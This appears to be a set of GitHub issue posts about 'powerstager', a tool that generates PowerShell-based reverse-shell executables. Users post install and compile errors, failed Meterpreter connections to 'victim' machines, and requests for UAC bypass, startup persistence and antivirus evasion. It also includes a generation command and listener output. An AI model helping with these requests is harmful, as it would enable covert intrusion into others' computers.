z0noxz / powerstager
A payload stager using PowerShell
License: MIT License
Error shows up:
Traceback (most recent call last):
File "/usr/lib/python3.5/runpy.py", line 193, in _run_module_as_main
"__main__", mod_spec)
File "/usr/lib/python3.5/runpy.py", line 85, in _run_code
exec(code, run_globals)
File "/root/tools/powerstager/powerstager/powerstager.py", line 19, in <module>
import names
ImportError: No module named 'names'
Allow hostnames to be added in the lhost variable.
Can you automatically attempt to elevate privileges using the PowerShell Empire bypassuac module and adding a register start up, in the effort to make the payload as stable as possible and to avoid touching the disk?
Thanks
Creating a 32-bit exe with the command:
powerstager -t win32 -o test.exe -m --lhost (myip) --lport (my listening port)
and running the exe in Windows XP 32-bit, the file does not establish a connection to the source.
Can you add support for PowerShell Empire stagers?
github.com/EmpireProject/Empire
Thanks
root@pc: /Desktop/gittools/powerstager# ./setup.py install
Traceback (most recent call last):
File "./setup.py", line 2, in <module>
from setuptools import setup
ImportError: No module named 'setuptools'
I checked the code and it seems setup.py requires a folder setuptools,
but there is no setuptools in your repos.
Hi, I created an exe with your script, and I specifically installed Windows 7 to test it out.
The exe is 32-bit, and this W7 is also 32-bit.
Before this video I opened the Metasploit console with a listener script, but it was unable to get any connection from this station.
This exe was supposed to connect to an IP on my local network, and I checked if PowerShell was installed.
I used tcpview to monitor the outside connection to see if the exe was trying to connect to my LAN IP, but it looks like the exe crashes or there is something wrong with the payload.
I created a video.
In this video there will be a black space; this happened when Windows asked me to run the app as administrator, but camstudio was unable to catch that.
Let me know if you are aware of this issue, and let me know if you need some tests from here to check out what is happening.
Here is the video: https://www.youtube.com/watch?v=vZoSZ7GAH18
I noticed that you recently updated powerstager; I installed it and it is popping an error.
I believe this error may be related to the C code that mingw will have to compile.
VNDL52CWI2.c: In function ‘main’:
VNDL52CWI2.c:16:2: error: ‘for’ loop initial declarations are only allowed in C99 or C11 mode
for (int _eSprfFF = 0; _eSprfFF < sizeof(_iVIzZpBrbO) / sizeof(_iVIzZpBrbO[0]); _eSprfFF++)
^
VNDL52CWI2.c:16:2: note: use option -std=c99, -std=gnu99, -std=c11 or -std=gnu11 to compile your code
VNDL52CWI2.c:26:11: error: redefinition of ‘_eSprfFF’
for (int _eSprfFF = 0; _eSprfFF < sizeof(_WLhBZbZQhea) / sizeof(_WLhBZbZQhea[0]); _eSprfFF++)
^
VNDL52CWI2.c:16:11: note: previous definition of ‘_eSprfFF’ was here
for (int _eSprfFF = 0; _eSprfFF < sizeof(_iVIzZpBrbO) / sizeof(_iVIzZpBrbO[0]); _eSprfFF++)
^
VNDL52CWI2.c:26:2: error: ‘for’ loop initial declarations are only allowed in C99 or C11 mode
for (int _eSprfFF = 0; _eSprfFF < sizeof(_WLhBZbZQhea) / sizeof(_WLhBZbZQhea[0]); _eSprfFF++)
[i] Shell listener : 1.1.1.1:1111
[i] Output : power.exe
[i] Target : win32
[i] Temp file : _yAzyjcr
[i] Encryption key : tAyOLIJYBKRN8xnc0dJjESK12
[i] Payload size : 1754 bytes
[i] Embedded size : 8584 bytes
[-] Failed to generate : power.exe
I have tried "Local-Spawn-Meterpreter" so many times, listened on msfconsole and set the payload to "windows/meterpreter/reverse_tcp", but I cannot receive any connection from a victim computer. Am I missing something? Or should I set a different payload to use that module? Could you help me with this if you have time?
First, thanks for this great job, but I wonder which type of PowerShell payload I should choose with your script: .bat or .ps1 or just string.txt or what? Thanks.
I get the error: mingw is not installed on your system.
Yet I have it installed.
Got this error:
[powerstager ASCII-art banner: "A payload stager using PowerShell", "Created by z0noxz"]
Traceback (most recent call last):
File "power.py", line 2962, in <module>
main(sys.argv[1:])
File "power.py", line 2949, in main
compile_source()
File "power.py", line 2694, in compile_source
Print.add_name_value("File signature", hashlib.md5(open(output, "rb").read()).hexdigest(), Print.info)
IOError: [Errno 2] No such file or directory: 'windowsbd'
This is with gcc-mingw-w64-i686 version 8.3.0.
After downgrading to version 4.9.1 from the Debian jessie repository the problem disappeared.
Your script requires all these packages:
gcc-mingw-w64-i686
gcc-mingw-w64-x86-64
binutils-mingw-w64-i686
binutils-mingw-w64-x86-64
and right now it will only work if these packages came from the jessie repository.
As of April 9, 2018... Antivirus now seems to pick up this payload. Any fix? Any way to change the internals so that the payload looks different to AV?.. Thank you... Absolutely love this generator! I came up with this idea myself once. I was glad to find it here, already made! I might HAVE to make it myself, now.
Hi, I am just passing by to tell you that your Python tool "powerstager" was implemented in fatrat at:
https://github.com/Screetsec/TheFatRat/
We added you to the credits of the fatrat script and your GitHub link to our readme.md.
Thanks for your excellent work on this tool.
Tried to run on the latest W10 build but it did not appear to work. So I have tried running the .ps1 locally as Admin and it causes PowerShell to crash.
Tried W32 & W64.